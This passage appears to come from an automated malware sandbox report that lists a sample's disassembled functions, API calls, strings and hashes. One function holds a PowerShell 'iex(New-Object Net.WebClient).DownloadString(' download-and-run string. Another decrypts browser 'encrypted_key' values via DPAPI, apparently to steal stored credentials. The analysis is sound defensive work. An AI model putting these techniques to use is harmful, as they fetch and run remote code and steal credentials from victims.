                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: *n@$*n@
                                                        • API String ID: 1029625771-193229609
                                                        • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                        • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                        • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                        • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                        Function 00B349E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcat.KERNEL32(?,0064A30C), ref: 00B34A42
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B34A68
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34A87
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34A9B
                                                        • lstrcat.KERNEL32(?,0064A284), ref: 00B34AAE
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34AC2
                                                        • lstrcat.KERNEL32(?,0064A2C8), ref: 00B34AD6
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B38FF7: GetFileAttributesA.KERNEL32(00000000,?,00B21DBB,?,?,0042565C,?,?,00420E1F), ref: 00B39006
                                                          • Part of subcall function 00B347D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B347E7
                                                          • Part of subcall function 00B347D7: RtlAllocateHeap.NTDLL(00000000), ref: 00B347EE
                                                          • Part of subcall function 00B347D7: wsprintfA.USER32 ref: 00B3480D
                                                          • Part of subcall function 00B347D7: FindFirstFileA.KERNEL32(?,?), ref: 00B34824
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                        • String ID:
                                                        • API String ID: 2540262943-0
                                                        • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                        • Instruction ID: 0288467fb9b0023c4540ab8645a502d1f5e059ce3caf46df32290cb2a6cd1844
                                                        • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                        • Instruction Fuzzy Hash: 3C31A2F6940308ABCB10FBF0CC86EE973B8AB58700F4045C9B24592081EEB09789CF96
                                                        Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                        Strings
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                        • <, xrefs: 00412D39
                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                        • ')", xrefs: 00412CB3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        • API String ID: 3031569214-898575020
                                                        • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                        • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                        • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                        • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                        Function 00B21487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B214A5
                                                        • __aulldiv.LIBCMT ref: 00B214BF
                                                        • __aulldiv.LIBCMT ref: 00B214CD
                                                        • ExitProcess.KERNEL32 ref: 00B214FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3404098578-2766056989
                                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction ID: 40566be62d501f234bf72210eac55144bbcefc7ecd06d87ee6fe446329dcbee3
                                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction Fuzzy Hash: EB016DB0940308BAEF10EBD4EC89B9DBBB8EB14705F208888F709772C0D7B49641CB55
                                                        Function 00B2A077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B30CC7: memset.MSVCRT ref: 00B30E83
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • memcmp.MSVCRT(?,00421114,00000003), ref: 00B2A116
                                                        • memset.MSVCRT ref: 00B2A14F
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00B2A1A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                        • String ID: @
                                                        • API String ID: 1977917189-2766056989
                                                        • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                        • Instruction ID: 70cc57d805e77b624b8f0d3460353a01fee02c65de3672a35114cf7d5cc08481
                                                        • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                        • Instruction Fuzzy Hash: BE616971A00258EBCB18EFA4DD86FED77B1AF55300F608158F90AAB191DB746A05CB42
                                                        Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00410DB8
                                                        • strtok_s.MSVCRT ref: 00410EFD
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s$lstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 348468850-0
                                                        • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                        • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                        • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                        • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                        Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                        • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                          • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                          • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                          • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                          • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                        • String ID: $"encrypted_key":"$DPAPI
                                                        • API String ID: 3731072634-738592651
                                                        • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                        • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                        • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                        • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                        Function 00B3CDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CodeInfoPageValidmemset
                                                        • String ID:
                                                        • API String ID: 703783727-0
                                                        • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                        • Instruction ID: 411a268c5bda43b313181ea0141e543248734a02c545bd386f71ff57211387d5
                                                        • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                        • Instruction Fuzzy Hash: 2031F830A042A59ED7259FB4CC952B9BFE0DB06310F3841FAE881EF192C738D809D761
                                                        Function 00B36B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemTime.KERNEL32(?), ref: 00B36BD3
                                                        • sscanf.NTDLL ref: 00B36C00
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B36C19
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B36C27
                                                        • ExitProcess.KERNEL32 ref: 00B36C41
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$System$File$ExitProcesssscanf
                                                        • String ID:
                                                        • API String ID: 2533653975-0
                                                        • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                        • Instruction ID: 7206272370c2f970c20583bd4ae74c7a979d349ceb4ac5e6dbc4f41b0a7d7a73
                                                        • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                        • Instruction Fuzzy Hash: 4121E7B6D04208ABCF08EFE4D949AEEB7F6FF48300F14956EE406A3250EB345604CB65
                                                        Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                        • RegOpenKeyExA.ADVAPI32(80000002,00824830,00000000,00020119,?), ref: 00417E5E
                                                        • RegQueryValueExA.ADVAPI32(?,0082AA90,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3466090806-0
                                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                        Function 00B38067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3809E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B380A5
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 00B380C5
                                                        • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 00B380E6
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B380F9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction ID: c039a328161d870b130696709a3c52fdd7c3a9074821852c381e5d94d20fadd4
                                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction Fuzzy Hash: 1E114FB5A84209FFD714CFD4DD4AFBBB7B9EB09710F104159F615A7280CB7558018BA2
                                                        Function 00B37987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3799B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B379A2
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00B37920), ref: 00B379C2
                                                        • RegQueryValueExA.ADVAPI32(00B37920,00420AAC,00000000,00000000,?,000000FF), ref: 00B379E1
                                                        • RegCloseKey.ADVAPI32(00B37920), ref: 00B379EB
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction ID: 872055278fb266b8c97bbe3fdef9ba263c3d36a0c6c4f07e8214d70ae15b883b
                                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction Fuzzy Hash: 3601F4B9A80308BFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281DA7555008F51
                                                        Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • StrStrA.SHLWAPI(00829FD8,?,?,?,0041140C,?,00829FD8,00000000), ref: 0041926C
                                                        • lstrcpyn.KERNEL32(0064AB88,00829FD8,00829FD8,?,0041140C,?,00829FD8), ref: 00419290
                                                        • lstrlenA.KERNEL32(?,?,0041140C,?,00829FD8), ref: 004192A7
                                                        • wsprintfA.USER32 ref: 004192C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpynlstrlenwsprintf
                                                        • String ID: %s%s
                                                        • API String ID: 1206339513-3252725368
                                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                        Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                        • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3466090806-0
                                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                        Function 00B21507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2151B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B21522
                                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B2153E
                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B2155C
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B21566
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction ID: 2f0465d66c1b8ad4530310e1796bdf42085243a7e50401e41db3efdccfba8c5f
                                                        • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                        • Instruction Fuzzy Hash: 5C0131BDA40208BFDB10DFE4DC49FAEB7BDEB48701F008199FA0597280D6749A018F91
                                                        Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041C74E
                                                          • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                          • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                        • __getptd.LIBCMT ref: 0041C765
                                                        • __amsg_exit.LIBCMT ref: 0041C773
                                                        • __lock.LIBCMT ref: 0041C783
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                        • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                        • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                        • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                        Function 00B3C9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
